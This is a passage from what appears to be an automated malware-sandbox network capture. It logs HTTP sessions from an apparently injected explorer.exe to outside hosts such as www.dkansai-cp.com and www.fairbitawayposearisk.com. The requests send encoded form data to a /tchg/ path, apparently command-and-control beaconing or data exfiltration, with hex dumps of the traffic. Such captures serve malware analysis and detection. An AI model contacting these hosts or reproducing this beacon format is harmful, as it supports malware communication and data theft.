wXDr4OliJM9dndgzgoK0zNEzV_AVqk2S4N7vi5GILOE9ipLTwzxsULfxhxyIqjdYLsMko9amZGxu09NDQR2QGsF0ojrE7Hi9n5JDIl(B~GrITagro_TzyDfKpSWBdwXAtzkPt7QyOmgi5yGx13xnQUT-goE8cZMV6nu2ZdlHzaT34cQSF8SZZJ8pPt(_e8IyXhmkUUt_7P6BlF2d6hSEk3Ruhxm6t0VClNm-ytqQrKS946LNCGjIPdHtmw~aR-R4OxjTgRCDejLJn8qlBb(P2RjuPwXZk_MUREiU4GGTw4g5(HEqlbo5N8t_eMqUvMM7YBfv25IJdQzdeggIRb3glCA9a8uVN_MEzA(dJhU63j~BGSkosLloJ6GX~zIJnjHB7PMTQy9S7qMLbnVpJPb7y9D8jOYBNku73SFmGkXeqYiGRD8VvEt4~02DR_eF28i4CuuFzuGz~bMYID8-6_cZDoWQ0IghDY0MCiDMs2u3gIfWSDQu3r3E3HYvUw9VMunBS23hGaYvOuSWW1PAdKbxcX7vqAj5jao5WiN7qe3sSpuSdfDFkmL0AQCCvdGOWwiCf0TUTGPLQcv6xGE8wUca5k8xgrlco-Q-ttUcBJgiJ03Z(_qJ(_gLLwxUB0WRJ4zwg4uK6dZUVEhDSjPrhI(GI_TFW8hR0ga3MgR9gPGJr4zlzwC9ESDITBzbEYfP3JMU13k50mOFpN09~vIpIsEQE7ORBNe9JsrJLsaWn-dKrMYgaF2UwDk3vhcVi3X0NsJy23daoK7dEBBlF6C7YLI05Kv0CsfD2byuWSxeNQj-qJF6cAkd1IdjyDIV7x651mMXI92_AEeGa8zHFgIm(MD25niR9V2lTnUj(O67SCKIza2U9N4sv0BMj7N2jSDyBXpRLfWBNpJlLG7RjJbzAiBMSd2wF40Psr3nfGJWRHd1oWjYbZxBeOt1Hu35pcXgy3AI4gM-vKb0seEHTCHiBka0YsT6VQbW6SNvdM9vxnBj27zm~D2WJGxJY-PdV2CFK-RajPoRoou7Pe7uf08eR_KukB1Qj_~S8PjC~o7Smc3R1XdXoy2_9HmVX_auIh0UpnovF14rU0(HaR8_hX553er7sSn5DckbntIrc50p1yU9FGw-mYkGG8d0QZfbYQIGqqSauZ7G1jtooBLLL4dgyLJYxKLrOu4aeKn-Qc6081NZqlsLlHt6VRg46A2_JpETW60qgRznBzXEcuz6O6a7ZwIWUVGtTZDy8LPBdHXbvsh9ubjFB4I4rkyMnByQtQSgL4ILpI0VZh~kVPObKNs_4rTQnBY-fOQafkn4X9DJOvuIJJYxFMjDKDGH~oo28mjvYH~8UhMonc~9QttGrjuSnIecy4PIodSFv3mtE_kh0YCVJIwlWCHt2NEwDnGg11F6Ol5w5bl2AkgrANUCyB5np6zPhDWaa5NXuK14zgJO03aPVVal4J(LabGwv-W2V98PphdR9wRDxyg4SaS7SC7Rg7cgpvlV4L87tSgqfDfttULfOrjXVBzZaMj-903VaZ75Q4j0(jxbCOpIC_9a62nq9dERrTz3QXUuGgicNDMFJeWywnYViSduuHaqmvnDr80DhWyQD6ZgzvMQjyBiso9FWSNcI6AVc5e7S9VpfyKA~TXmKEJ3F57Mn2QwYFt1GTcCxkdfB4qkGmiEqVWlmM54dMC5mEuQavEDerAZpHhKVl(G5tQm9dSytk77fMeHdfFP96DvhyWsnHBAqjwL6i(32qODWHrpugVGBzSAn3KrRPi4TRGoA2(AVcQnULdduG91hUXxoebuwWZOQzUtIE(D0bXDDcrIuP7xcw9eh_62alDXDxedip92UurSKqZgI-A4xV7kGtdwpA2TH_MOhcUcf_0yJMNubIRSJj5FcinQgxI9sA8-4ATo5koy8KTVQpu_C7bIJlP9MWW3WIs6NBCDMVfFgq~mHf8qjMUzi-5NR8zDGk5c0DZy(aqNw2usQeIVg76YCUG6ouiGc_YUPBJ0~kAutQtGbQsA92LSk0CXZicQh1JnvzhtWKAIGXESznYH1otQ6QnI4oyAf7H_CdiF6GM0ec0K9o2EzDpadpDBjSn7Aw~3HHrvZ388Lsoi7DtYIVP-c4ZmSixv7DEqPPIpYEAB3QS-IhKF6j7BkBs7(3SmF7oBC-OURSUY2GmvnNluM-Tb1XayQhFdpevjW5F9nurbrLEwi_VTRB11rJfqNACWELzzUfxqHA9Zi53-ojKTEyUUviZ82AGkRfA6ktItfzp6kiTs91f72wWUx79ffncg(DktoRomZiDzvWgpz7a2vRdnB2iQqAZ5sSvrGtPVSTQaDt3EHM5Sc2YMNWnQfGhHyGlGBxCmNeKIpLMLf2~1Mgo1mWRt2HyI69YFeT6o0LxCqOpfz9RwHYcicUIeIbGaOljC3dd-8kgNA0Sv29ZdH4zzLoIL710DGyzdaJLCl5SxwB2BxRg4E50Eh0qubRjhhc
                                                                                                                    May 30, 2023 11:12:49.551518917 CEST1618OUTData Raw: 74 62 4c 70 51 76 41 41 72 51 45 74 57 44 33 70 44 6f 4d 77 4b 47 37 6a 53 66 49 5a 48 32 4f 78 6a 58 28 46 71 5f 4c 48 31 76 64 37 66 6a 44 2d 7a 6d 39 52 63 46 37 56 33 50 78 78 7e 64 6e 54 59 75 4b 79 72 48 42 48 75 33 37 6f 54 6d 51 76 68 46
                                                                                                                    Data Ascii: tbLpQvAArQEtWD3pDoMwKG7jSfIZH2OxjX(Fq_LH1vd7fjD-zm9RcF7V3Pxx~dnTYuKyrHBHu37oTmQvhFWGaVXhvzAdzZnrt_NZnijqmDjXAZQWkWBcL1qOvOhjSF9PtmvHtqU0(dqxRp5xsBpQhum995jIiD1JgR6_PEOONTe37fvGdC03AOdUPu(6kTXOQVM_Q2BAQd5PhHfhoFEF3RX70dtrqCHEyQ5y7TJib467Pt(CfW4
                                                                                                                    May 30, 2023 11:12:49.709243059 CEST1621OUTData Raw: 4a 65 50 6d 72 7a 49 57 35 32 34 4e 4f 78 78 79 58 78 5a 55 46 48 77 50 48 37 68 6f 6b 39 7e 57 62 2d 6e 41 42 50 71 41 66 41 78 43 68 76 70 69 47 74 42 5a 75 70 50 69 65 4c 55 30 54 7a 51 66 5a 52 6d 56 65 49 38 66 48 71 68 70 57 36 65 51 4c 31
                                                                                                                    Data Ascii: JePmrzIW524NOxxyXxZUFHwPH7hok9~Wb-nABPqAfAxChvpiGtBZupPieLU0TzQfZRmVeI8fHqhpW6eQL15fhxQFq-MLrDEKh_iQWP8HPiq0PIQ-6ukwYcaLzXmfcMMh2Q(gZfzhYjDsfZi-7ovUolSKHD(TUKgRnFuwtU809ivSETWWg-y5tK7Q(xqj71(ZTISw67Min0dVxuSDPlqyxl8c(MSt1XzyDKAbQZvyvL~BDCSWikD
                                                                                                                    May 30, 2023 11:12:49.709340096 CEST1624OUTData Raw: 51 34 53 67 51 56 79 4d 4d 49 61 7a 6b 53 6c 39 72 4e 63 44 47 67 72 58 31 47 28 4f 74 33 39 43 4a 4f 6d 68 55 5a 44 6e 4d 45 64 65 67 6f 6b 68 77 76 43 41 34 7a 72 76 67 5f 70 6b 7a 50 35 71 7e 4e 43 32 33 5a 44 30 7a 6f 52 58 69 6d 78 50 62 50
                                                                                                                    Data Ascii: Q4SgQVyMMIazkSl9rNcDGgrX1G(Ot39CJOmhUZDnMEdegokhwvCA4zrvg_pkzP5q~NC23ZD0zoRXimxPbPFEe0jFfXuTJFYTyJVXKeiiDI7jiuB8Qjp4XlmkukR765xIPjVcnTRlGWkRLunB8Cy900K4jLRfmrCQtSpi2Y1c0U7usYRH~RWhaRGYqjUz~zYVvSL3amAEQKBY5GDfqqJpWDX0U4zyWEDF6NI1Ky1oo7qu1sctULP
                                                                                                                    May 30, 2023 11:12:49.709533930 CEST1638OUTData Raw: 46 69 69 56 59 75 75 6f 69 49 38 45 39 37 67 4e 42 6c 70 45 33 47 31 49 49 4f 4e 4d 54 5a 38 53 5a 32 73 6b 33 4a 62 38 77 6a 57 48 6d 78 44 6a 63 48 72 30 57 4c 4d 45 51 6b 39 38 4f 57 46 71 37 4f 30 64 49 59 66 36 71 30 51 41 41 73 4b 4b 6c 53
                                                                                                                    Data Ascii: FiiVYuuoiI8E97gNBlpE3G1IIONMTZ8SZ2sk3Jb8wjWHmxDjcHr0WLMEQk98OWFq7O0dIYf6q0QAAsKKlSNu4GVzTwZdnJ1ZswYZHWZD6xXzBdeH4Q5tmD39jQO5nto56e8eCWDanXU2Ws8llxEMZ17ZWXTOikg5RerFAAV5~e7ojPY4pcqOyJRHr5V6NR7Ku-F5J9dvrGEombTBTduz1Ytsyx1I4TUM2iKpnYHSHrU4IPcmqvP
                                                                                                                    May 30, 2023 11:12:49.709681988 CEST1643OUTData Raw: 7e 59 47 76 33 68 4c 59 34 74 6e 4c 35 53 32 49 56 4a 6a 62 28 55 68 73 47 36 30 36 71 69 48 31 62 30 63 78 6b 5f 30 68 41 61 42 6a 47 33 69 66 46 6d 45 68 72 74 4e 33 53 59 78 33 31 47 64 77 67 55 59 57 41 47 42 64 37 42 64 47 48 53 56 33 42 65
                                                                                                                    Data Ascii: ~YGv3hLY4tnL5S2IVJjb(UhsG606qiH1b0cxk_0hAaBjG3ifFmEhrtN3SYx31GdwgUYWAGBd7BdGHSV3BeVp0YYkSd225NWNWCMMcZiX2klTbk84teMSaV9IXtPUM-8ocg4QvuNN4UR786~wiAsTuprfyuus8Uo-DGM9di1Rk5fQ73Elpc4-U4965tJcyisiRJF1g4KabG2k4HrFY-ouocT4vv~B~k9Xhjl2anXaCdLIsHb9VGF
                                                                                                                    May 30, 2023 11:12:49.867014885 CEST1645OUTData Raw: 31 71 36 6a 69 66 58 5a 31 56 7a 6e 39 5f 59 4f 33 71 6d 4f 42 78 61 54 43 4c 50 2d 50 65 6b 49 4e 54 42 32 37 44 6b 31 65 66 4e 6e 46 70 5a 66 76 51 75 68 51 43 6f 39 65 32 78 5f 4b 66 39 78 7a 72 51 56 54 77 4d 4d 79 38 74 53 32 64 4a 4c 6f 41
                                                                                                                    Data Ascii: 1q6jifXZ1Vzn9_YO3qmOBxaTCLP-PekINTB27Dk1efNnFpZfvQuhQCo9e2x_Kf9xzrQVTwMMy8tS2dJLoA5PtXGZ85ZVVs(gLupVJKL3PxZm~wnxgbJSOP4T9nDtDoYcvC9edxRvcMIh30b1J1JhGYvnvAlx(DLLcjI715e92rKe~0lPf6rGnYfA1TLPnf2RLvOJBGeWrlc1UC6o6o1Bkac4B7zBFREI1DCX3xKBR3o9yDlp1lr
                                                                                                                    May 30, 2023 11:12:49.867060900 CEST1646OUTData Raw: 6d 4f 51 79 53 76 7e 42 44 4b 47 33 78 59 58 62 58 39 6b 51 32 63 36 77 77 57 65 6a 6e 79 31 36 67 34 45 50 71 68 65 5a 61 68 61 4f 56 5f 4c 4a 53 64 70 45 41 62 71 65 69 51 59 4f 75 44 6b 4a 78 76 51 4b 33 4d 79 32 76 72 6d 6e 33 45 7a 36 61 64
                                                                                                                    Data Ascii: mOQySv~BDKG3xYXbX9kQ2c6wwWejny16g4EPqheZahaOV_LJSdpEAbqeiQYOuDkJxvQK3My2vrmn3Ez6adTFou~qGeaIrOGiBr3tKCUFVpY5THWKy-3HOVJ9NUHOdRTNvpiyOPMTI33YRfrAAOgD9XmeVpHQuYinaus_V0dCWyk7jhbBKDFrIw(HvMh0djBCu8Y_9IkJo3ti7ziGDS5Xr3uwQYUVo_w0PqkgjNtoX6bXabJRx-f
                                                                                                                    May 30, 2023 11:12:49.867113113 CEST1648OUTData Raw: 32 44 48 7a 47 65 32 47 79 6f 69 6f 65 77 73 53 39 69 58 31 4b 4b 68 70 41 63 56 69 59 33 72 6e 33 36 37 49 44 58 76 6b 51 56 79 53 63 5a 73 61 42 44 58 49 30 6e 4b 6e 6d 61 39 74 6a 46 4c 61 48 45 7e 46 4b 6b 46 79 48 5a 63 54 44 4a 6d 45 39 75
                                                                                                                    Data Ascii: 2DHzGe2GyoioewsS9iX1KKhpAcViY3rn367IDXvkQVyScZsaBDXI0nKnma9tjFLaHE~FKkFyHZcTDJmE9uYOaF4k9yciOMFmrr8UoRUeksDfHefTWGcsiXmPUuU2r43QwZuhHzIfBw~grPHFZ1K1w1Fob1AsquARz-vWpDdGw4ntZxIGzKShBhQ3C2HdiRYQXBmKdFzLozJBgH10BSkK6kHI7d4kvzGkHMydQR0GIjHFLIUZgp5
                                                                                                                    May 30, 2023 11:12:49.867295980 CEST1657OUTData Raw: 51 72 4e 41 51 57 6f 4a 61 6e 68 54 37 4f 77 54 66 67 6a 32 44 79 71 4b 32 38 31 41 63 61 50 30 71 6e 31 63 28 78 67 78 78 7a 34 51 72 6d 72 59 38 61 53 56 41 5a 72 52 4f 4f 6c 65 39 6b 61 54 30 79 69 63 35 68 37 49 41 68 34 36 75 62 4a 5a 6f 42
                                                                                                                    Data Ascii: QrNAQWoJanhT7OwTfgj2DyqK281AcaP0qn1c(xgxxz4QrmrY8aSVAZrROOle9kaT0yic5h7IAh46ubJZoB9TnB1omPgc~hhef6WSlHxj0Rpfp7N9Q37zOsoqCnP-p-UnhISjDPTDpGLy(I8RsYfEqnZw7KUDaDmYr03-6s4gsBQst6SFIZZvQOhUKpKLOEaMni8fqZQd7nMr6YqLq8bWr-AMWDX7lquYt3QeFiEFX_~oBiA2WrB
                                                                                                                    May 30, 2023 11:12:50.549453974 CEST1659INHTTP/1.1 200 OK
                                                                                                                    Date: Tue, 30 May 2023 09:12:49 GMT
                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Content-Length: 320
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Data Raw: 3c 62 72 20 2f 3e 0a 3c 62 3e 4e 6f 74 69 63 65 3c 2f 62 3e 3a 20 20 55 6e 64 65 66 69 6e 65 64 20 76 61 72 69 61 62 6c 65 3a 20 75 73 72 5f 69 64 20 69 6e 20 3c 62 3e 2f 76 61 72 2f 77 77 77 2f 68 74 6d 6c 2f 6e 65 77 72 65 64 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 35 31 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 4e 6f 74 69 63 65 3c 2f 62 3e 3a 20 20 55 6e 64 65 66 69 6e 65 64 20 76 61 72 69 61 62 6c 65 3a 20 69 73 70 20 69 6e 20 3c 62 3e 2f 76 61 72 2f 77 77 77 2f 68 74 6d 6c 2f 6e 65 77 72 65 64 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 35 31 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 4e 6f 74 69 63 65 3c 2f 62 3e 3a 20 20 55 6e 64 65 66 69 6e 65 64 20 76 61 72 69 61 62 6c 65 3a 20 64 74 20 69 6e 20 3c 62 3e 2f 76 61 72 2f 77 77 77 2f 68 74 6d 6c 2f 6e 65 77 72 65 64 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 35 31 3c 2f 62 3e 3c 62 72 20 2f 3e 0a
                                                                                                                    Data Ascii: <br /><b>Notice</b>: Undefined variable: usr_id in <b>/var/www/html/newred.php</b> on line <b>51</b><br /><br /><b>Notice</b>: Undefined variable: isp in <b>/var/www/html/newred.php</b> on line <b>51</b><br /><br /><b>Notice</b>: Undefined variable: dt in <b>/var/www/html/newred.php</b> on line <b>51</b><br />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    87192.168.11.2049846216.108.231.10880C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:12:52.237648010 CEST1659OUTGET /tchg/?O0qEM=RUgOIEC2bpKEAb3gt63mE+Z8A/D48vS2kv7pSD36MjRmJGY6VLK565PH5Ya2jxSU9dFBv1ZYes9vP/U9IpvgXfidz0YLsWTogQ==&CF1Ki=UnDuQcdCFs1MNsvY HTTP/1.1
                                                                                                                    Host: www.fairbitawayposearisk.com
                                                                                                                    Connection: close
                                                                                                                    Data Raw: 00 00 00 00 00 00 00
                                                                                                                    Data Ascii:
                                                                                                                    May 30, 2023 11:12:52.926728964 CEST1660INHTTP/1.1 200 OK
                                                                                                                    Date: Tue, 30 May 2023 09:12:52 GMT
                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16
                                                                                                                    X-Powered-By: PHP/5.4.16
                                                                                                                    Content-Length: 320
                                                                                                                    Connection: close
                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                    Data Raw: 3c 62 72 20 2f 3e 0a 3c 62 3e 4e 6f 74 69 63 65 3c 2f 62 3e 3a 20 20 55 6e 64 65 66 69 6e 65 64 20 76 61 72 69 61 62 6c 65 3a 20 75 73 72 5f 69 64 20 69 6e 20 3c 62 3e 2f 76 61 72 2f 77 77 77 2f 68 74 6d 6c 2f 6e 65 77 72 65 64 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 35 31 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 4e 6f 74 69 63 65 3c 2f 62 3e 3a 20 20 55 6e 64 65 66 69 6e 65 64 20 76 61 72 69 61 62 6c 65 3a 20 69 73 70 20 69 6e 20 3c 62 3e 2f 76 61 72 2f 77 77 77 2f 68 74 6d 6c 2f 6e 65 77 72 65 64 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 35 31 3c 2f 62 3e 3c 62 72 20 2f 3e 0a 3c 62 72 20 2f 3e 0a 3c 62 3e 4e 6f 74 69 63 65 3c 2f 62 3e 3a 20 20 55 6e 64 65 66 69 6e 65 64 20 76 61 72 69 61 62 6c 65 3a 20 64 74 20 69 6e 20 3c 62 3e 2f 76 61 72 2f 77 77 77 2f 68 74 6d 6c 2f 6e 65 77 72 65 64 2e 70 68 70 3c 2f 62 3e 20 6f 6e 20 6c 69 6e 65 20 3c 62 3e 35 31 3c 2f 62 3e 3c 62 72 20 2f 3e 0a
                                                                                                                    Data Ascii: <br /><b>Notice</b>: Undefined variable: usr_id in <b>/var/www/html/newred.php</b> on line <b>51</b><br /><br /><b>Notice</b>: Undefined variable: isp in <b>/var/www/html/newred.php</b> on line <b>51</b><br /><br /><b>Notice</b>: Undefined variable: dt in <b>/var/www/html/newred.php</b> on line <b>51</b><br />


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    88192.168.11.2049847183.90.238.4380C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:12:58.207803011 CEST1661OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.dkansai-cp.com
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 187
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.dkansai-cp.com
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.dkansai-cp.com/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 6c 54 47 5f 69 5a 51 31 65 38 72 54 52 36 43 43 76 48 53 6f 59 49 68 6a 76 32 36 45 68 76 33 63 4f 71 4c 75 41 48 52 39 75 69 54 46 4b 38 31 33 77 69 32 6d 71 76 32 45 70 57 70 72 77 5f 42 52 28 53 69 36 6a 38 75 78 7a 50 71 73 65 55 4f 7a 52 46 41 2d 43 39 6e 63 62 4e 49 5a 4f 67 65 45 69 59 49 79 41 52 72 41 74 4f 36 68 31 74 32 4f 7e 6a 45 5f 75 55 7e 58 4e 41 69 5a 33 56 37 32 6d 4c 72 6c 28 45 42 77 33 4c 36 51 68 79 75 34 4d 72 70 64 44 61 4a 76 45 4f 42 76 79 6a 77 66 4e 65 73 76 69 4d 7e 4a 4a 44 77 6d 68 62 78 74 42 67 29 2e 00 00 00 00 00 00 00 00
                                                                                                                    Data Ascii: O0qEM=lTG_iZQ1e8rTR6CCvHSoYIhjv26Ehv3cOqLuAHR9uiTFK813wi2mqv2EpWprw_BR(Si6j8uxzPqseUOzRFA-C9ncbNIZOgeEiYIyARrAtO6h1t2O~jE_uU~XNAiZ3V72mLrl(EBw3L6Qhyu4MrpdDaJvEOBvyjwfNesviM~JJDwmhbxtBg).
                                                                                                                    May 30, 2023 11:12:58.478796005 CEST1662INHTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Tue, 30 May 2023 09:12:57 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Transfer-Encoding: chunked
                                                                                                                    Connection: close
                                                                                                                    Vary: Accept-Encoding
                                                                                                                    Last-Modified: Mon, 02 Jul 2018 00:27:42 GMT
                                                                                                                    ETag: W/"afe-56ff9440f72fb"
                                                                                                                    Content-Encoding: gzip
                                                                                                                    Data Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b 9e 96 6a 6b cb 23 d5 a8 80 72 a4 71 d8 58 34 e2 1e a8 e0 6c 8e 04 55 8f cd 5b ed 02 0a 9d 80 79 9e ca 52 c1 ce c5 5a 20 69 2e a0 a1 f1 ca d4 3b 95 29 e9 59 61 6e 5b 47 ae 02 bd 56 15 37 a8 07 ae a6 f8 53 70 b1 23 be 32 47 d0 29 42 83 36 1b 41 e6 d2 83 a5 df d1 d2 af e2 86 b8 29 ee 89 ab a0 32 4f 9d 45 b3 ef b1 a8 4e 1d f9 26 7e 13 db e2 6b b1 79 fd 91 b8 81 66 03 86 ce 8f 4b f1 71 1a 60 a8 98 a1 0f f0 c5 16 52 e6 52 0d ba 10 fb a1 15 92 80 56 15 cc 3d dc 78 d4 27 56 9d c8 fe 17 50 76 74 42 19 c5 48 43 fa 19 29 a0 a9 c9 b7 94 4c f2 6c 61 8f d6 80 58 07 a6 84 04 4a ee 30 8f 01 89 f3 75 1a 91 98 aa 6c ba 5c 15 24 37 d1 5c 48 45 9e d7 f9 2a cc 73 f7 bb f4 6b 65 3f fb 41 aa 40 49 9b 60 06 23 d6 80 46 8d f5 a5 48 68 3e 4e bc 39 12 51 07 f7 33 01 1d cd 69 98 af aa 2b e6 60 3f 96 14 35 b9 29 99 72 d1 68 be 49 24 45 44 b6 4b c4 9e 3e a4 67 54 96 bc 97 d5 51 b2 d0 f4 30 f5 75 2a 35 ba 56 c4 9a d0 b5 e6 02 0a 99 47 5d 34 54 ad ea 2e 6b 7d 42 ce 20 93 7e 52 47 27 15 ad 09 ac 71 a0 13 e1 56 c4 fa d8 86 64 ba e6 21 07 b7 42 32 a0 70 79 6c 24 29 da c0 a3 da 46 17 34 94 cf e7 e3 96 8f 6b b9 47 22 18 25 2b 6c 62 27 3e a3 00 f5 95 93 22 89 49 13 05 59 e2 b1 fb a4 c2 16 74 b8 04 7f 76 52 e3 4f 96 40 ef 78 5a 7b b9 35 ec 61 54 1a f0 18 b0 3d c4 9a 78 da b9 2d d6 c5 96 f8 52 ec 1a c6 00 33 29 42 c3 b6 f1 6e 83 b8 14 23 e6 7b 6d b9 18 08 f1 11 f6 5d f4 36 6c 30 b5 dd 60 d3 1c d4 22 bc 90 88 a6 f2 c0 e8 41 40 9f 19 aa e0 98 d1 4c a6 5b 63 dc 85 6c 3c d9 99 45 23 53 97 47 2b 93 49 8f 60 5e d2 a5 75 c0 a1 9c 8f 3e 83 7c cf 59 0e 7c 9f 2e db 75 4e 4d 57 bf 45 3c ae 71 78 d9 af 4c 46 d1 ab e6 6e 02 28 86 dc 69 38 bd 88 dd f9 48 55 a3 8e 68 bf 43 4e e3 5f 34 5e d7 05 24 1e 89 3b e2 ba d8 ed fc 2b ee 8a c7 e2 05 6c c7 f5 d7 36 e3 4d ba 31 95 3f b4 8f fa 74 81 87 7a dc ed 23 7e 32 ad 1b 44 7c b6 d7 b6 57 b2 ab f8 cf c4 9f be 02 ca f7 7a d5 37 d6 99 ae 81 06 94 74 21 39 dd 29 2c aa 4b e9 01 51 38 13 97 78 61 f4 ea 1a d4 25 39 73 7b db 9a 8c c1 a2 51 b4 e3 6f 2f 7c 83 6d 75 0d 31 8a f2 0b 07 ef 2e 9d 43 d4 2d 99 72 8a e1 5b
                                                                                                                    Data Ascii: 519VoG>{aJ%fc'qJ-Jj;wuc2SPI6MK(*&Qfg^'{})8:sgQ=jxe(ZR@?aqdN;b?k"4<R@GicE[id:ha~D|v$g|4}Q;NVaQ:qc3'OW@Rs7Y2O^ruPF{V`c#5ZD6?"!hpKZhFMUX@[jk#rqX4lU[yRZ i.;)Yan[GV7Sp#2G)B6A)2OEN&~kyfKq`RRV=x'VPvtBHC)LlaXJ0ul\$7\HE*ske?A@I`#FHh>N9Q3i+`?5)rhI$EDK>gTQ0u*5VG]4T.k}B ~RG'qVd!B2pyl$)F4kG"%+lb'>"IYtvRO@xZ{5aT=x-R3)Bn#{m]6l0`"A@L[cl<E#SG+I`^u>|Y|.uNMWE<qxLFn(i8HUhCN_4^$;+l6M1?tz#~2D|Wz7t!9),KQ8xa%9s{Qo/|mu1.C-r[
                                                                                                                    May 30, 2023 11:12:58.478858948 CEST1663INData Raw: 2c cf 6a b1 9e 2d 17 25 39 f2 2e 02 9e f2 5f b1 12 c8 3b 8a 54 cb 67 ef 05 05 3c b4 6b ae 2c 2e 89 ab e2 96 58 e3 37 f9 df fc 0b be 0e bf 77 c5 13 38 8d ab fc e1 ea 15 7e 9f 5f e1 3b fc 29 bf c5 77 f9 8f 52 d7 59 02 50 39 ed df 44 8e 87 c3 b0 64
                                                                                                                    Data Ascii: ,j-%9._;Tg<k,.X7w8~_;)wRYP9Ddiu).mswRuma`_lVOLW61oVke_$qm]UY~x?'=:-sX[J{m/W~?,;s:


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                    89192.168.11.2049848183.90.238.4380C:\Windows\explorer.exe
                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                    May 30, 2023 11:13:00.998691082 CEST1664OUTPOST /tchg/ HTTP/1.1
                                                                                                                    Host: www.dkansai-cp.com
                                                                                                                    Connection: close
                                                                                                                    Content-Length: 527
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Origin: http://www.dkansai-cp.com
                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                    Accept: */*
                                                                                                                    Referer: http://www.dkansai-cp.com/tchg/
                                                                                                                    Accept-Language: en-US
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    Data Raw: 4f 30 71 45 4d 3d 6c 54 47 5f 69 5a 51 31 65 38 72 54 58 65 47 43 6a 41 6d 6f 5a 6f 67 52 71 32 36 45 34 5f 33 59 4f 71 48 75 41 43 39 74 75 52 33 46 4c 63 46 33 78 67 65 6d 28 76 32 45 68 32 70 79 7e 66 42 67 28 53 7e 45 6a 34 71 78 7a 4f 4f 73 59 32 57 7a 54 31 41 5f 4b 64 6e 62 4d 39 49 55 4b 67 65 30 69 59 45 75 41 51 76 41 74 5f 47 68 30 76 4f 4f 35 32 34 38 39 45 28 39 4a 77 69 47 73 6c 37 34 6d 4c 6d 47 28 41 42 67 32 34 6d 51 67 53 4f 34 4e 72 70 65 57 36 4a 6f 62 65 41 77 32 42 39 68 48 76 52 53 38 63 28 7a 46 48 64 6f 6b 49 31 6a 44 5a 50 38 34 79 37 6a 67 57 28 55 68 63 46 74 75 7a 6e 70 72 33 58 66 79 4e 30 65 49 41 6b 41 6d 66 28 35 67 6b 59 6c 6f 59 30 53 56 31 77 56 4a 62 76 30 66 78 7a 66 56 6d 4c 4e 4d 6c 64 59 44 4d 4a 7a 5a 4b 58 67 66 33 61 6f 76 2d 79 4f 65 32 78 69 78 4e 46 70 45 66 4a 61 62 70 48 76 32 4a 65 54 6f 64 6a 5f 5a 72 6f 70 50 38 42 58 35 32 38 